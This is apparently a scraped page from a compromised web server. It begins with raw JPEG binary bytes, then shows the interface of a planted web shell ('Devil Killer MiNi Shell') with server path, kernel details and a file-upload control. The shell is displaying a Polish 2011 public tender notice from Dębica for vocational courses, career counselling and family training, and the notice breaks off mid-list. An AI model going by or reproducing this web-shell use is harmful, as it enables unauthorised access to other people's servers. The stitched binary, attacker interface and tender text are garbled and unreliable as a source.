JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110608/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110608/159599-N-2011.html

<p class="kh_header"><b>Dębica: Organizacja i przeprowadzenie szkoleń zawodowych , doradztwa zawodowego oraz wykonanie usługi treningu umiejętności psychospołecznych - trener rodzinny, w ramach realizacji projektu systemowego - Czas na aktywność w Gminie Dębica</b><br>
<b>Numer ogłoszenia: 159599 - 2011; data zamieszczenia: 08.06.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek Pomocy Społecznej w Dębicy , ul. Batorego 13, 39-200 Dębica, woj. podkarpackie, tel. 014 6803333, faks 014 6803333.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ugdebica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Samorządowa jednostka organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja i przeprowadzenie szkoleń zawodowych , doradztwa zawodowego oraz wykonanie usługi treningu umiejętności psychospołecznych - trener rodzinny, w ramach realizacji projektu systemowego - Czas na aktywność w Gminie Dębica.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.    Przedmiotem zamówienia  są  USŁUGI   : 

Organizacja i przeprowadzenie szkoleń zawodowych , doradztwa zawodowego oraz wykonanie usługi treningu umiejętności psychospołecznych - trener rodzinny, w ramach realizacji projektu systemowego - Czas na aktywność w Gminie Dębica.


Realizacja projektu systemowego - Czas na aktywność w Gminie Dębica-  współfinansowana jest przez Unię Europejską w ramach Europejskiego Funduszu Społecznego Programu Operacyjnego Kapitał Ludzki , Priorytet VII-Promocja integracji społecznej, Działanie 7.1- Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1- Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej.
Głównym celem projektu jest zwiększenie aktywności zawodowej u 35 osób zagrożonych
wykluczeniem społecznym będących klientami Gminnego Ośrodka Pomocy Społecznej
w Dębicy. Projekt skierowany jest do 35 osób bezrobotnych lub nieaktywnych zawodowo,  zamieszkujących na terenie Gminy Dębica.
2.	Opis  przedmiotu  zamówienia : 

 1) Część I zamówienia :   Kurs Kucharz- ciastkarz dla 10 osób ( 7 kobiet + 3 mężczyzn),
a) ilość osób do przeszkolenia : 10 osób ( 7 kobiet + 3 mężczyzn) ,
b) minimalna liczba godzin szkolenia -250 godzin dydaktycznych (1 godzina dydaktyczna-45 minut)
c) maksymalny okres trwania szkolenia -  7 tygodni
d) godziny realizacji szkolenia - 8.00- 19.00 maksymalnie 8 godzin dydaktycznych dziennie
e) miejsce realizacji szkolenia - miasto Dębica
f) termin realizacji szkolenia - sierpień - 07 październik 2011 r.


2) Część II  zamówienia :  Kurs koparko -ładowarki dla  10 osób ( 10 mężczyzn),
a) ilość osób do przeszkolenia : 10 osób ( 10 mężczyzn) ,
b) minimalna liczba godzin szkolenia -202 godziny  dydaktyczne (1 godzina dydaktyczna-45 minut)
c) maksymalny okres trwania szkolenia-  7 tygodni
d) godziny realizacji szkolenia - 8.00- 19.00 maksymalnie 8 godzin dydaktycznych dziennie
e) miejsce realizacji szkolenia - miasto Dębica
f) termin realizacji szkolenia - lipiec -19 sierpień 2011 r.




3) Część III zamówienia :  Kurs murarz- tynkarz dla 5 osób ( 5 mężczyzn),
a) ilość osób do przeszkolenia : 5 osób ( 5 mężczyzn) ,
b) minimalna liczba godzin szkolenia - 200 godzin dydaktycznych(1 godzina dydaktyczna-45 minut)
c) maksymalny okres trwania szkolenia -  7 tygodni
d) godziny realizacji szkolenia - 8.00- 19.00 maksymalnie 8 godzin dydaktycznych dziennie 
e) miejsce realizacji szkolenia - miasto Dębica
f) termin realizacji szkolenia - sierpień - 07 październik 2011 r.

4) Część IV zamówienia :  Kurs kosmetyczny z elementami stylizacji paznokci dl 15 osób ( 15 kobiet) , 
a) ilość osób do przeszkolenia : 15 osób ( 15 kobiet ) ,
b) minimalna liczba godzin szkolenia -100 godzin dydaktycznych (1 godzina dydaktyczna-45 minut)
c) maksymalny okres trwania szkolenia -  6 tygodni
d) godziny realizacji szkolenia - 8.00- 19.00 maksymalnie 8 godzin dydaktycznych dziennie
e) miejsce realizacji szkolenia- miasto Dębica
f) termin realizacji szkolenia - lipiec - 19 sierpień 2011 r.

5) Część V  zamówienia :  Kurs kelner- barman dla 10 osób (5 kobiet + 5 mężczyzn) .
a) ilość osób do przeszkolenia : 10 osób ( 5 kobiet + 5 mężczyzn) ,
b) minimalna liczba godzin szkolenia - 120 godzin dydaktycznych(1 godzina dydaktyczna-45 minut)
c) maksymalny okres trwania szkolenia -  4 tygodnie
d) godziny realizacji szkolenia - 8.00- 19.00 maksymalnie 8 godzin dydaktycznych dziennie
e) miejsce realizacji szkolenia - Dębica
f) termin realizacji szkolenia - październik - 15 listopad 2011 r.

Wykonawca szkoleń opisanych w punktach od 1) do 5) zapewnia :
a) Salę wykładową wraz ze sprzętem dydaktycznym. W sali szkoleniowej należy umieścić informację o współfinansowaniu szkolenia przez Europejski Fundusz Społeczny z logo EFS i realizowanego w ramach Programu Operacyjnego Kapitał Ludzki,
b) Materiały szkoleniowe dla uczestników,
c) Warunki w czasie szkoleń zgodne z przepisami BHP w dostosowaniu do liczby uczestników, a w szczególności temperatura w pomieszczeniu powinna być adekwatna do warunków atmosferycznych panujących na zewnątrz, 
d) Organizację i pokrycie kosztów badań lekarskich w zakresie zdolności do przystąpienia do kursów uczestników danego szkolenia,
e) Odzież roboczą odpowiednią do danego rodzaju szkolenia,  
f) Wyżywienie: ciastka , kawa, herbata, woda mineralna, ciepły posiłek - drugie danie, 
g) Ubezpieczenie uczestników szkolenia od następstw nieszczęśliwych wypadków (podczas szkolenia, w drodze na szkolenie i ze szkolenia),
h) Program szkoleń zawodowych oraz  przeprowadzenie szkoleń odbędzie się zgodnie z obowiązującymi przepisami prawa, 
i) Przeprowadzenie kursu zawodowego przez osoby posiadające odpowiednie kwalifikacje zawodowe wymagane przepisami prawa.
j) Zakończenie zajęć zakończy się oceną zdobytych umiejętności oraz wydaniem stosownego certyfikatu o ukończeniu szkolenia, zgodnie z obowiązującymi w tym zakresie przepisami (Rozporządzenie Ministra Edukacji i Nauki z dnia 3 lutego 2006 r. w sprawie uzyskiwania uzupełnienia przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. z 2006 r. Nr 31, poz.216). Wydane certyfikaty muszą zawierać logotypy Programu Operacyjnego Kapitał Ludzki oraz informację, że projekt jest współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego,
k) Po wykonaniu zadania Wykonawca przedstawi Zamawiającemu listy obecności uczestników, plany zajęć, kserokopie rejestru wydanych certyfikatów (wraz z potwierdzeniem odbioru certyfikatu przez uczestnika szkolenia), opinię na temat każdego uczestnika szkolenia,
l) Zamawiający dopuszcza możliwość przeprowadzenia części praktycznej szkoleń poza miastem Dębica, w przypadku, gdy część praktyczna szkolenia będzie się odbywać poza terenem miasta Dębica,  Wykonawca zapewni dojazd uczestników projektu do miejsca szkolenia i z powrotem, koszty dojazdu uwzględni w złożonej ofercie.


6) Część VI zamówienia :  Doradztwo zawodowe dla 35 osób (25 kobiet + 10 mężczyzn)
- łączna ilość godzin : 37 godzin 
- indywidualne w ilości 1 godziny na 1 osobę przed rozpoczęciem szkoleń, 
- grupowe (Warsztaty Aktywnego Poszukiwania Pracy) w ilości 2 godziny na grupę po zakończeniu szkoleń.

a) ilość osób do przeszkolenia - 35 osób (25 kobiet + 10 mężczyzn)
b) czas trwania szkolenia - przed rozpoczęciem szkoleń 1 godzina i po zakończeniu szkoleń 2 godziny
c) godziny realizacji szkolenia - 8.00 - 16.00 maksymalnie 2 godzin dydaktycznych dziennie
d) miejsce realizacji szkolenia - Dębica
e) termin realizacji szkolenia:  
    -    01- 05 lipiec 2011 r. doradztwo indywidualne, 
    -    01- 10 grudzień 2011 r. doradztwo grupowe

Celem usługi jest zaktywizowanie osób bezrobotnych poprzez podniesienie świadomości w zakresie mechanizmów rynku pracy, dostarczenie kompetencji zawodowych poszukiwanych na lokalnym rynku pracy a w szczególności ;
- kwalifikacja do kursów zawodowych, - podniesienie wiedzy w zakresie mechanizmów i dynamiki rynku pracy, - metody poszukiwania pracy, - zdobycie umiejętności analizy swoich mocnych i słabych stron, -zdobycie umiejętności prowadzenia rozmowy kwalifikacyjnej, -zdobycie umiejętności przygotowania i pisania listu motywacyjnego, życiorysu zawodowego (CV), kwestionariusza osobowego, - poznanie własnych praw związanych z rynkiem pracy.

Wykonawca doradztwa zawodowego zapewnia:
-sprzęt dydaktyczny, -materiały szkoleniowe dla uczestników , -warunki zgodne z przepisami BHP
Wykonawca po  wykonaniu zadania przedstawi Zamawiającemu listy obecności uczestników, karty pracy, opinię na temat każdego uczestnika. Dopuszcza się możliwość wykonania usługi doradztwa zawodowego  w budynku Urzędu Gminy Dębica na  sali  konferencyjnej.


7) Część VII  zamówienia : Treningi umiejętności psychospołecznych - trener rodzinny dla 7 rodzin,
 w ilości 10 godzin na 1 rodzinę (indywidualne i grupowe) - łączna ilość godzin 70 godzin; rodzaj treningów i ilość godzin zostanie przeanalizowany i dopasowany przez trenera rodzinnego w trakcie realizacji pod kątem danej rodziny oraz rodzaju problemów, w związku z czym dopuszczalne jest wykonanie usługi w przeliczeniu na 1 rodzinę zarówno - 1 godzina treningów indywidualnych + 9 godzin treningów grupowych jak i  1 godzina treningów grupowych i 9 godzin treningów indywidualnych.
a) ilość rodzin do przeprowadzenia treningów : 7 rodzin
b) czas realizacji szkolenia - od lipca do 30 listopada 2011 r.
c) godziny realizacji - 8.00 - 19.00 maksymalnie 3 godziny dziennie
d) miejsce realizacji - w miejscu zamieszkanie rodzin lub-i w siedzibie Wykonawcy

Celem usługi jest podniesienie kompetencji psychospołecznych rodzin zagrożonych wykluczeniem społecznym a w szczególności: - trening zastępowania agresji, - trening radzenia sobie ze stresem, - trening rozwiązywania sytuacji konfliktowych, - trening komunikacji, - trening umiejętności wychowawczych dla rodziców,  - trening autoprezentacji, wizerunku, budowania autorytetu ;
oraz 
-warsztaty psychospołeczne podnoszące poziom motywacji, - samooceny, - poczucia własnej wartości; -poprawa wizerunku,- komunikacji interpersonalnej, - kształtowania zachowań asertywnych, - radzenia sobie w sytuacjach problemowych, - budowanie wizerunku , autoprezentacja, budowanie autorytetu, - zarządzanie czasem (sobą w czasie), planowanie, organizowanie.

Wykonawca treningów kompetencji psychospołecznych zapewnia:
-sprzęt dydaktyczny, -materiały szkoleniowe dla uczestników , -warunki zgodne z przepisami BHP
Wykonawca po  wykonaniu zadania przedstawi Zamawiającemu listy obecności uczestników, karty pracy, opinię na temat każdego uczestnika..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Organizacja i przeprowadzenie szkoleń zawodowych , doradztwa zawodowego oraz wykonanie usługi treningu umiejętności psychospołecznych - trener rodzinny, w ramach realizacji projektu systemowego - Czas na aktywność w Gminie Dębica.
1) Część I zamówienia :   Kurs Kucharz- ciastkarz ,
2) Część II  zamówienia :  Kurs koparko -ładowarki,
3) Część III zamówienia :  Kurs murarz- tynkarz ,
4) Część IV zamówienia :  Kurs kosmetyczny z elementami stylizacji paznokci,
5) Część V  zamówienia :  Kurs kelner- barman,
6) Część VI zamówienia :  Doradztwo zawodowe.
O wartosci do 20 %  przeprowadzonych kursów.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.40.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) Opis sposobu dokonania oceny spełniania warunku dla Części I zamówienia - Kurs Kucharz- ciastkarz
    dla 10 osób .
Zamawiający uzna, że warunek posiadania wiedzy i  doświadczenia jest spełniony, jeżeli Wykonawca wykaże,  że w okresie ostatnich 3 lat przed  upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy - tym okresie) wykonał lub wykonuje usługi w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia  tj. co najmniej 1 usługę szkoleniową polegającą na organizacji i przeprowadzeniu szkolenia zawodowego w zawodzie Kucharz-ciastkarz dla minimum 7 osób, z podaniem jej wartości, przedmiotu, daty wykonania i odbiorców oraz załączy dokument potwierdzający, że usługi te zostały wykonane lub są wykonywane należycie.  


2) Opis sposobu dokonania oceny spełniania warunku dla Części II zamówienia - Kurs koparko -ładowarki 
    dla  10 osób.
Zamawiający uzna, że warunek posiadania wiedzy i  doświadczenia jest spełniony, jeżeli Wykonawca wykaże,  że w okresie ostatnich 3 lat przed  upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy - tym okresie) wykonał lub wykonuje usługi w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia  tj. co najmniej 1 usługę szkoleniową polegającą na organizacji i przeprowadzeniu szkolenia zawodowego Operator Koparko-ładowarki dla minimum 7 osób, z podaniem jej wartości, przedmiotu, daty wykonania i odbiorców oraz załączy dokument potwierdzający, że usługi te zostały wykonane lub są wykonywane należycie.  


3) Opis sposobu dokonania oceny spełniania warunku dla Części III zamówienia - Kurs murarz- tynkarz 
    dla 5 osób.
Zamawiający uzna, że warunek posiadania wiedzy i  doświadczenia jest spełniony, jeżeli Wykonawca wykaże,  że w okresie ostatnich 3 lat przed  upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy - tym okresie) wykonał lub wykonuje usługi w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia  tj. co najmniej 1 usługę szkoleniową polegającą na organizacji i przeprowadzeniu szkolenia zawodowego w zawodzie murarz-tynkarz dla minimum 3 osób, z podaniem jej wartości, przedmiotu, daty wykonania i odbiorców oraz załączy dokument potwierdzający, że usługi te zostały wykonane lub są wykonywane należycie.  


4) Opis sposobu dokonania oceny spełniania warunku dla Części IV zamówienia - Kurs kosmetyczny 
    z elementami stylizacji paznokci dla 15 osób. 
Zamawiający uzna, że warunek posiadania wiedzy i  doświadczenia jest spełniony, jeżeli Wykonawca wykaże,  że w okresie ostatnich 3 lat przed  upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy - tym okresie) wykonał lub wykonuje usługi w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia  tj. co najmniej 1 usługę szkoleniową polegającą na organizacji i przeprowadzeniu szkolenia- Kurs kosmetyczny dla minimum 10 osób , z podaniem jej wartości, przedmiotu, daty wykonania i odbiorców oraz załączy dokument potwierdzający, że usługi te zostały wykonane lub są wykonywane należycie.  


5) Opis sposobu dokonania oceny spełniania warunku dla Części V zamówienia - Kurs kelner- barman dla
    10 osób.
Zamawiający uzna, że warunek posiadania wiedzy i  doświadczenia jest spełniony, jeżeli Wykonawca wykaże,  że w okresie ostatnich 3 lat przed  upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy - tym okresie) wykonał lub wykonuje usługi w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia  tj. co najmniej 1 usługę szkoleniową polegającą na organizacji i przeprowadzeniu szkolenia - Kurs kelner - barman dla minimum 7 osób, z podaniem jej wartości, przedmiotu, daty wykonania i odbiorców oraz załączy dokument potwierdzający, że usługi te zostały wykonane lub są wykonywane należycie.  


6) Opis sposobu dokonania oceny spełniania warunku dla Części VI zamówienia - Doradztwo zawodowe
    dla 35 osób .
Zamawiający uzna, że warunek posiadania wiedzy i  doświadczenia jest spełniony, jeżeli Wykonawca wykaże,  że w okresie ostatnich 3 lat przed  upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy - tym okresie) wykonał lub wykonuje usługi w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia  tj. co najmniej 1 usługę szkoleniową polegającą na organizacji i przeprowadzeniu szkolenia - Doradztwo zawodowe dla minimum 25 osób, z podaniem jej wartości, przedmiotu, daty wykonania i odbiorców oraz załączy dokument potwierdzający, że usługi te zostały wykonane lub są wykonywane należycie.  


7) Opis sposobu dokonania oceny spełniania warunku dla Części VII zamówienia - Treningi umiejętności psychospołecznych - trener rodzinny dla 7 rodzin.
Zamawiający uzna, że warunek posiadania wiedzy i  doświadczenia jest spełniony, jeżeli Wykonawca wykaże,  że w okresie ostatnich 3 lat przed  upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy - tym okresie) wykonał lub wykonuje usługi w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia  tj. co najmniej 1 usługę szkoleniową polegającą na organizacji i przeprowadzeniu szkolenia - Treningi umiejętności psychospołecznych - trener rodzinny dla minimum 5 rodzin, z podaniem jej wartości, przedmiotu, daty wykonania i odbiorców oraz załączy dokument potwierdzający, że usługi te zostały wykonane lub są wykonywane należycie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonania oceny spełniania warunku dla wszystkich 7 Części zamówienia.
Zamawiający uzna, że warunek dysponowania odpowiednim potencjałem technicznym jest spełniony, jeżeli Wykonawca złoży wraz z ofertą Oświadczenie w zakresie art.22 ust.1 ustawy Pzp - (Załącznik nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonania oceny spełniania warunku dla wszystkich 7 Części zamówienia.
Zamawiający uzna, że warunek dysponowania osobami zdolnymi do wykonania zamówienia jest spełniony, jeżeli Wykonawca złoży wraz z ofertą Oświadczenie w zakresie art.22 ust.1 ustawy Pzp - (Załącznik nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonania oceny spełniania warunku dla wszystkich 7 Części zamówienia.
Zamawiający uzna, że warunek dotyczący sytuacji ekonomicznej i finansowej jest spełniony, jeżeli Wykonawca złoży wraz z ofertą Oświadczenie w zakresie art.22 ust.1 ustawy Pzp - (Załącznik nr 2 do SIWZ)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

